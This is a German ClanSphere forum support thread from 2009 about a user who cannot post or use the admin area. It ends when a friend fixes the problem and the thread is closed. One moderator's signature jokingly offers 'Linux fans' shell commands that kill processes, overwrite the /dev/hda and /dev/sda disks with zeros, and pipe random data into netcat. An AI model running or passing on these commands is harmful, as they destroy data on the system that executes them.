Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 5
Seite [1]
n3o73


Beginner





Beiträge: 18
# Thema - 21.01.2009 um 16:59 Uhr
Hi
Hab Clansphere seid einigen Tagen bei uns Online.
Alles war bestens.
Jetzt geh ich auf der Page (admin) und kann nichts mehr machen????
Ich sehe alles Forum Adminbereich und und.
Kann aber nicht mehr ins Forum Schreiben ich bekomme die Antwort war erfolgreich aber da rüber kommt Fehler kann Seite nicht finden.
Meine Post ist auch in der Forum Übersicht zu sehen aber nicht mehr wenn man drauf geht und es lesen möchte.
In Adminbereich ist dasselbe nur ohne Fehler Meldung nur kann ich dort nichts mehr machen.


Bitte euch um Hilfe


------------------
Ich will wie mein Opa im Schlaf sterben, nicht heulend und schreiend wie sein Beifahrer.


Inaktiv
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 1 - 21.01.2009 um 17:33 Uhr
link zur page ?


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Tom08 ClanSphere Team

Supporter
Supporter



Herkunft: Daheim
Beiträge: 2923
# Antwort: 2 - 21.01.2009 um 17:35 Uhr
ähm ... was????

1. Welche Clansphere-Version hast du installiert? Die aktuelle? Clansphere 2008.2.1?
2. Link zu deiner Seite?

Nun zu deinem Problem:
Wenn du dich einloggst, siehst du ja unter Home, welche Zugriffsrechte du hast. Steht da immer noch Administrator (Edit: oder Webmaster)?

Oder meinst du mit deinem BEitrag oben, dass von dir eingetragene Daten nicht gespeichert werden???

Tom


------------------
Bei Problemen mit Code von mir bitte eine Private Nachricht an mich


Zuletzt editiert von Tom08 ClanSphere Team am 22.01.2009 um 16:28 Uhr (1x Editiert)
Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 3 - 21.01.2009 um 17:36 Uhr
Steht da immer noch Administrator?

da steht doch Webmaster oder irre ich mich


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
n3o73
Thread-Ersteller


Beginner





Beiträge: 18
# Antwort: 4 - 25.01.2009 um 12:18 Uhr
sry Leute
Lag einige Tag Krank im Bett.
Ich danke euch für eure Hilfe hier.
aber einer von mein Jungs hat es hinbekommen in der zeit wo ich nicht on war. kann in moment auch nicht sagen was es war muss erst mal mit dem reden.
Noch mal danke


------------------
Ich will wie mein Opa im Schlaf sterben, nicht heulend und schreiend wie sein Beifahrer.




Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 5 - 04.02.2009 um 02:16 Uhr
./closed


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|

Dieses Thema wurde von pHaeno* ClanSphere Team PM geschlossen.

Antworten: 5
Seite [1]